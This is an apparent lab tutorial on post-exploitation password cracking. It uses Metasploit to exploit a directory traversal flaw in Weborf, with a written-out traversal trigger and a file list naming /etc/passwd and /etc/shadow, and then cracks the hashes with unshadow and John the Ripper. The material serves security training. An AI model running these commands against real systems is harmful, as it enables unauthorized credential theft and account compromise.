Post-Exploit Password Cracking
In previous posts, we covered several different ways of obtaining the contents of the /etc/shadow file where user password hashes are stored. In this post, we will go through yet another way of grabbing the /etc/shadow file from the compromised system. We will then go through the steps of cracking the hashes to obtain the actual password values. So let's see step by step how we can do post-exploit password cracking.
Step 1: Starting Vulnerable Server
First, let's start our vulnerable server application as root:
Now open up a new tab by command: Ctrl + Shift + T
Step 2: Creating File List
We already saw how the directory traversal vulnerability in Weborf can be exploited manually. In this post, we will automate the process with Metasploit and combine it with downloading the password files. The Metasploit auxiliary module that we will use requires a file list to know which files to download from the compromised system. Create the file list as instructed below. We are using the URL encoding to replace "/" with "%2f":
cat > files.txt etc%2fpasswd etc%2fshadow
Press ENTER, then hit Ctrl+D to save the file and return to the prompt.
Step 3: Starting Metasploit Framework
Now start the Metasploit Framework. Don't forget the* -L* option.
Step 4: Selecting Module
Next, let's select the Generic HTTP Directory Traversal Utility module. It checks the targets for the directory traversal vulnerability and depending on the selected option, can download specific files or check if it is possible to write files outside of the www directory. Select the module as follows:
Step 5: Setting Scanner Options
There are quite a few options we need to set for this module. The first two should be familiar by now: RHOSTS for remote (target) host(s) and RPORT for the target port (which is set to 80 by default, so we need to change it to the Weborf's default port). The next three options are TRIGGER, for the path that triggers the vulnerability, ACTION, which in our case is DOWNLOAD, and FILELIST, which specifies the list of files to download. Set the options exactly as shown below:
set RHOSTS skillsetlocal.com set RPORT 8080 set TRIGGER ..%2f..%2f..%2f..%2f..%2f..%2f..%2f set ACTION DOWNLOAD set FILELIST files.txt
Make sure to use all capital letters for DOWNLOAD, otherwise, you will get an error.
Step 6: Running Scan
Now enter run to launch the attack.
The scan should be done very quickly and you should see that our target files were downloaded. Note the location where the files were saved, we will use it in the next step.
Enter exit to close Metasploit Framework and return to the regular prompt.
Step 7: Unshadow
For the purpose of cracking, we’ll use John the Ripper. Here’s a description from the maker openwall:
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS (the latter requires a contributed patch). Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus many more hashes and ciphers in "community enhanced" -jumbo versions and/or with other contributed patches.
Reference - http://www.openwall.com/john/doc/
Sounds like it’s perfect for the job. We could run JtR directly on the /etc/shadow file, but a better approach would be to create a new file by using unshadow. It will allow JtR to use some of the GECOS fields information from the /etc/passwd file as well. Use unshadow as follows, specifying files downloaded by the Metasploit module. The format is unshadow PASSWDFILE SHADOW FILE, in that order, so make sure you are entering the correct file names. The yyyymmddhhmmss part is the timestamp, and xxxxxx and yyyyyy are numeric identifiers, which will be different for the* /etc/passwd* and /etc/shadow. We are saving the new file as passwords.
sudo unshadow .msf4/loot/*yyyymmddhhmmss*_default_127.0.0.1_lfi.data_*xxxxxx*.txt .msf4/loot/*yyyymmddhhmmss*_default_127.0.0.1_lfi.data_*yyyyyy*.txt > passwords
sudo unshadow .msf4/loot/20200826071515_default_127.0.0.1_lfi.data_827959.txt .msf4/loot/20200826071515_default_127.0.0.1_lfi.data_297245.txt > passwords
Let's view the new file to make sure everything went OK:
Let's get cracking!
Step 8: Running John the Ripper
Issue the following command to use JtR with our passwords file with default options.
sudo john passwords
Understand that the crack could take days in a real scenario. But simple passwords like “password1” or “password2” should be cracked very quickly.
Step 9: Reading Wordlist
For stronger passwords, we can look at the available JtR options, such as using a wordlist. There are many large wordlists available on the Internet, some of them included with the standard Kali Linux installation. You can also create your own, which we did for this lab. Issue the following command to read it:
To speed up the process, we cheated a bit and included only the actual user passwords. Feel free to experiment later and try adding more words or use different JtR options.
Step 10: Running JtR with Wordlist
To use the wordlist, simply reissue the command and add the -w option pointing to the file:
sudo john passwords -w=wordlist.txt
You can see the rest of the passwords.
Also notice that John picks up where it left off, only cracking the passwords that weren't cracked in the previous sessions.
Step 11: Viewing Cracked Passwords
To see the passwords extracted from a certain file, use the --show option as follows:
sudo john --show passwords
Also Read: Client Side Exploitation